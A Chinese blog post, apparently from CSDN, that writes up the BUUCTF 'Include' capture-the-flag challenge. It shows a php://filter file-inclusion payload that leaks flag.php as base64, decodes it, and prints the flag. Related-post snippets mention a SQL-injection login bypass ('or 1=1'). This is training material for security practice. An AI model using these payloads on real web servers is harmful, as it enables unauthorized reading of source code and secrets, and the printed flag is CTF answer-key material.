BUUCTF----Include

最新推荐文章于 2024-07-26 17:57:56 发布
最新推荐文章于 2024-07-26 17:57:56 发布
阅读量97 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingwen666usve/article/details/130282867
版权

php伪代码

在web链接后面添加

?file=php://filter/read=convert.base64-encode/resource=flag.php

得到一串字符

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YTEwMTU3MTYtNDdmZS00M2VmLTg5MjItYzBjZmU4Yzc4MTE3fQo=

(发现这是Base64的密码密文)

用解码器编码一下就得到

<?php
echo "Can you find out the flag?";
//flag{a1015716-47fe-43ef-8922-c0cfe8c78117}

哦了

Witness_Liu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1203
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
libXau-1.0.7源码
10-11
CC=arm-linux-gnueabihf-gcc CXX=arm-linux-gnueabihf-g++ ../configure --prefix=/home/sxhlvye/libXau-1.0.7/install --host=arm-linux CPPFLAGS="-I/home/sxhlvye/xproto-7.0.23/install/include" LDFLAGS="-L/...
BUUCTF-Include
weixin_51383898的博客
10-07 87
根据题目意思,应该是文件包含漏洞,文件包含漏洞通常配合伪协议进行使用。直接来到flag.php页面,但是没有flag。base64解码之后,获取到flag。启动靶机,有个链接,点击跳转。
buuctf-Include
xixihahawuwu的博客
11-23 1309
打开题目环境,就看到一个tips 点击 先回之前界面看看源码 线索这不就来了吗 … 这就是粗心的下场…浪费时间了 看下源码 源码啥都没有 突然觉得这题好熟悉的说 上题不也是给出了flag.php但是直接连接却没有内容吗,想着会不会又是php伪协议 毕竟这两道题是连在一起的(咳咳,不太明白的可以去看我的上一个博客,我可没有要你们给我增加浏览量的意思哈) 按照上题的格式试一下 ?file=php://filter/read=convert.base64-encode/resource=flag.p.
buuctf-web篇
qq_74152953的博客
11-13 84
初始界面:尝试输入用户名和密码判断为get传参,判断是否存在注入 ' or 1=1 -- qwe,点击登录出现flag。
BUUCTF-PHP
z1moq的博客
09-07 1006
启动靶机,打开网页发现有提示说存在备份文件 直接使用 www.zip 下载备份源码 在 index.php 中发现反序列化函数 此文件包含了 class.php 所以继续前往该文件进行审查 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __con
buuctf-PHP
xixihahawuwu的博客
11-23 1223
看题目说备份网站,扫一下看看 把文件下载下来 一些源码 这里的unserialize涉及到一个反序列化 接着看class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ .
BUUCTF-Ezsql1
lin__ying的博客
03-18 911
让我访问</span><span class="heading">让我访问
BUUCTF--Web篇详细wp_buuctfweb
2401_84301352的博客
06-24 589
php.iniInclude然后Base64解码就可以得到flag。
tesseract-3.02.02-win32-lib-include-dirs(源文件).zip
02-29
tesseract-3.02.02-win32-lib-include-dirs(SDK) tesseract-3.02.02-win32-lib-include-dirs(SDK) tesseract-3.02.02-win32-lib-include-dirs(SDK) tesseract-3.02.02-win32-lib-include-dirs(SDK)
pack-struct.md
12-18
# 改变结构体成员的字节对齐 ## 例子 #include typedef struct { char a; int b; } ST_A;
sdcc-include:platformIO SDCC include和8051标头
03-28
依赖 SDCC brew install sdcc 科技咨询委员会 安装python,获取pip brew install python@3.9 安装stcgal pip3.9 install stcgal --user 刷程序 使用sdcc编译程序生成hex sdcc xxx.c 使用stcgal拷贝hex到串口...
webpack-merge-and-include-globally:合并多个文件(js,css ..)并“按原样”运行以包含它们。 支持通过自定义转换和通配符路径进行缩小
05-01
npm install --save-dev webpack-merge-and-include-globally 用法 假设您想使诸如jquery , moment (包括3种语言)和toastr在全球范围内可用,而您正在努力通过webpack使它们成为全局库,或者只是因为require()...
PHP商城案例
最新发布
王世凡的技术博客
07-26 294
http://www.e9933.com/
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 857
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 654
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1048
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 341
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
PHP基础语法-Part2
weixin_51591328的博客
07-25 332
与其他语言相同。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值